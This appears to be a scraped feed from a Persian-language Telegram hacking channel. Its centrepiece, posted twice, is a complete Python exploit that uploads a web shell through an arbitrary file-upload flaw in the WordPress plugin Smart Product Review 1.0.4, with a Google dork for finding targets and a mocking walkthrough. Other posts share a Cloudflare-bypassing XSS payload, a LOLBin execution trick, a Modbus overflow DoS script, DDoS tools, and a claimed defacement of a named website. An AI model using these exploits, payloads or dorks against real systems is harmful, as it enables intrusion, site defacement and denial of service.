infoSec Black Friday - All the deals for infoSec related software/tools this Black Friday
Github
#Black_Friday
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Black_Friday
——————
0Day.Today
@LearnExploit
@Tech_Army
#WP #vulnerabilities #Vuln #File_Upload #Wordpress
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4
جهت مشاهده ی دمو بزنید.
دورک و تحلیل اسکریپت تو پست بعدی
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4
جهت مشاهده ی دمو بزنید.
دورک و تحلیل اسکریپت تو پست بعدی
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#WP #vulnerabilities #Vuln #File_Upload #Wordpress
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.
#Google~Dork:
#Download~Script:
Download
خب بریم ببینیم این اسکریپت چطوری کار میکنه :
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب داره اینجا لایبرری ها رواضافه میکنه
import os.path
from os import path
import json
import requests
import time
import sys
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅ نمایشی از خودش را انداخته اینجا :|
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Republice By : IR0Day.Today Channel")
def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب اینجا داره فانکشینی مبنی بر چک کردن باگ تعریف میکنه
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("No script kiddies please!!" in raw):
return False;
else:
return True;
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅انجام امورات مهم :) اینجا صورت گرفته :
def main():
banner() # Banner ejra mishe
if(len(sys.argv) != 3): #Age toole vurudi kamtar az 3 ta bood
usage(); # ino nemayesh bede
sys.exit(1); # badesh kharej sho
base = sys.argv[1] #argoman 1 ke hamoon targete mesal : google.com
file_path = sys.argv[2] #argoman dovom (inm shelletone )
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعضی چیزارو واسه راحتی کار ریخته توی متغیر
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ; #inja beham chasbunde
check = vuln_check(uri); # khob inja Chizaei ke chasbondaroo mifrestee be function check
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده چک شدن حالا اگه False بود میزنه اسیب پذیر نیست و خارج میشه ولی اگه اسیب پذیر بود میزنن اسیب پذیره و خارج میشه 😐
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅اینجا یه دیکشنری تعریف میکنه که تو متد request لازمه ( البته از نوع پست )
files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )
✅تو خط بالایی داره دیتا هارو میفرسته
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده ارسال query چک میکنه که فایل شله هست اونجا یا نه اگه بود میزنه حله دهنشو سرویس کن نبود میگه بعدی... و خارج میشه
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)
main();
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب این بود کل قضیه 😐🙌 بابا خیلی جدی نگیرید اینارو
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@TechArmy
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.
#Google~Dork:
inurl: /wp-content/plugins/smart-product-review/
#Download~Script:
Download
خب بریم ببینیم این اسکریپت چطوری کار میکنه :
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب داره اینجا لایبرری ها رواضافه میکنه
import os.path
from os import path
import json
import requests
import time
import sys
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅ نمایشی از خودش را انداخته اینجا :|
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Republice By : IR0Day.Today Channel")
def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب اینجا داره فانکشینی مبنی بر چک کردن باگ تعریف میکنه
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("No script kiddies please!!" in raw):
return False;
else:
return True;
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅انجام امورات مهم :) اینجا صورت گرفته :
def main():
banner() # Banner ejra mishe
if(len(sys.argv) != 3): #Age toole vurudi kamtar az 3 ta bood
usage(); # ino nemayesh bede
sys.exit(1); # badesh kharej sho
base = sys.argv[1] #argoman 1 ke hamoon targete mesal : google.com
file_path = sys.argv[2] #argoman dovom (inm shelletone )
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعضی چیزارو واسه راحتی کار ریخته توی متغیر
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ; #inja beham chasbunde
check = vuln_check(uri); # khob inja Chizaei ke chasbondaroo mifrestee be function check
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده چک شدن حالا اگه False بود میزنه اسیب پذیر نیست و خارج میشه ولی اگه اسیب پذیر بود میزنن اسیب پذیره و خارج میشه 😐
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅اینجا یه دیکشنری تعریف میکنه که تو متد request لازمه ( البته از نوع پست )
files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )
✅تو خط بالایی داره دیتا هارو میفرسته
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده ارسال query چک میکنه که فایل شله هست اونجا یا نه اگه بود میزنه حله دهنشو سرویس کن نبود میگه بعدی... و خارج میشه
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)
main();
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب این بود کل قضیه 😐🙌 بابا خیلی جدی نگیرید اینارو
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@TechArmy
Telegram
AttachLearnExploit
👍2
#MODBUS #BufferOverFlow #Bug #Dos
آسیب پذیری بافر در برنامه ی مود باس ورژن
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
آسیب پذیری بافر در برنامه ی مود باس ورژن
7.3.1
➖➖➖➖➖➖➖➖➖➖➖➖➖➖IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#MODBUS #BufferOverFlow #Bug #Dos
آسیب پذیری بافر در برنامه ی مود باس ورژن
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅توضیحات :
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅Download Box:
🔗Download v 7.3.1
🔐Pass : plc247.com
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅Download Box:
🔗Script Py
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
آسیب پذیری بافر در برنامه ی مود باس ورژن
7.3.1
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅توضیحات :
مود باس ( Modbus) یک شبیه ساز مستر پروتکل مودباس (Modbus master) است که برای تست و شبیه سازی پروتکل Modbus کاربرد دارد. با استفاده از رابط کاربری ای که این نرم افزار فراهم می کند، کاربر قادر است تا چندین ModbusSlave (برنامه ها و دستگاه هایی که از این پروتکل استفاده می کنند) را به صورت همزمان مانیتور کند. برای هر ویندوز شما می توانید یک Modbus slave ID، آدرس، تابع، سایز و poll rate اختصاص دهید.
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅Download Box:
🔗Download v 7.3.1
🔐Pass : plc247.com
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅Download Box:
🔗Script Py
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
Telegram
AttachLearnExploit
This media is not supported in your browser
VIEW IN TELEGRAM
ویدیئو آموزشی مربوط به پست بالا ( نحوه ی استفاده از باگ توی برنامه )
➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@TechArmy
➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@TechArmy
آسیب پذیری 0day LPE روی Windows Installer
borncity
#0day #Vulnerability
——————
0Day.Today
@LearnExploit
@Tech_Army
borncity
#0day #Vulnerability
——————
0Day.Today
@LearnExploit
@Tech_Army
Cloudflare bypass:
#bountytips
——————
0Day.Today
@LearnExploit
@Tech_Army
-top['al\x65rt']('sailay')-
twitter #bountytips
——————
0Day.Today
@LearnExploit
@Tech_Army
Twitter
sailay(valen)
Cloudflare bypassed !!! "-alert(0)-" : blocked "-top['al\x65rt']('sailay')-" : passed #bountytips
آموزش ابزار Byte-Ddos در کالی لینوکس
Github
#dos #ddos #tools #kali
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#dos #ddos #tools #kali
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#lolbin : mpiexec.exe & smpd.exe
Path: C:\Program Files\Microsoft MPI\Bin
——————
0Day.Today
@LearnExploit
@Tech_Army
Path: C:\Program Files\Microsoft MPI\Bin
mpiexec.exe spawns smpd.exe which then spawns an executable.
Usage: mpiexec.exe -n 1 c:\path\to\binary.exe——————
0Day.Today
@LearnExploit
@Tech_Army
باگ بانتی بازا یاهو یه CTF برگزار کرده میتونین از این لینک برید بخونین کامل
yahooinc
——————
0Day.Today
@LearnExploit
@Tech_Army
yahooinc
——————
0Day.Today
@LearnExploit
@Tech_Army
Yahooinc
Cyber Security Awareness Month Extravaganza! Bug Bounty CTF (Public-009) | Paranoids | Yahoo Inc.
In an effort to celebrate National Cybersecurity Awareness Month, the Paranoids are launching a capture the flag-style bug bounty promotion aimed at offensively testing a number of specified Yahoo accounts.
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DiKaLL - UZIHACKER - EVILBOY - AT7 [+]
https://www.zone-h.org/mirror/id/38946463
https://www.bahraami.com/
——————
0Day.Today
@LearnExploit
@Tech_Army
[+] X0P4SH4 - iliyahr - R4DiKaLL - UZIHACKER - EVILBOY - AT7 [+]
https://www.zone-h.org/mirror/id/38946463
https://www.bahraami.com/
——————
0Day.Today
@LearnExploit
@Tech_Army
حمله سایبری به سامانه یادگیری الکترونیکی دانشگاه تهران تایید شد.
مرکز فناوری اطلاعات دانشگاه تهران در ایمیلی به دانشجویان و اساتید این دانشگاه کندی و اختلال سامانه یادگیری الکترونیکی دانشگاه تهران در هفته گذشته را به دلیل حمله سایبری اعلام کرد.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
مرکز فناوری اطلاعات دانشگاه تهران در ایمیلی به دانشجویان و اساتید این دانشگاه کندی و اختلال سامانه یادگیری الکترونیکی دانشگاه تهران در هفته گذشته را به دلیل حمله سایبری اعلام کرد.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
اینو کدوم کصکشی زده 😂😂😂 ما کجا اکسپلویت میفروشیم هیچی دیگه 😐😂
https://cloudsek.com/the-rise-of-cybercrime-on-telegram-and-discord-and-the-need-for-continuous-monitoring/
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
https://cloudsek.com/the-rise-of-cybercrime-on-telegram-and-discord-and-the-need-for-continuous-monitoring/
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
😁2
ابزار قدرتمند dos/ddos
#ddos #dos
——————
0Day.Today
@LearnExploit
@Tech_Army
با کلی متود مختلف که میتونین از فایل Readme اون رو بخونین
Github#ddos #dos
——————
0Day.Today
@LearnExploit
@Tech_Army
👍2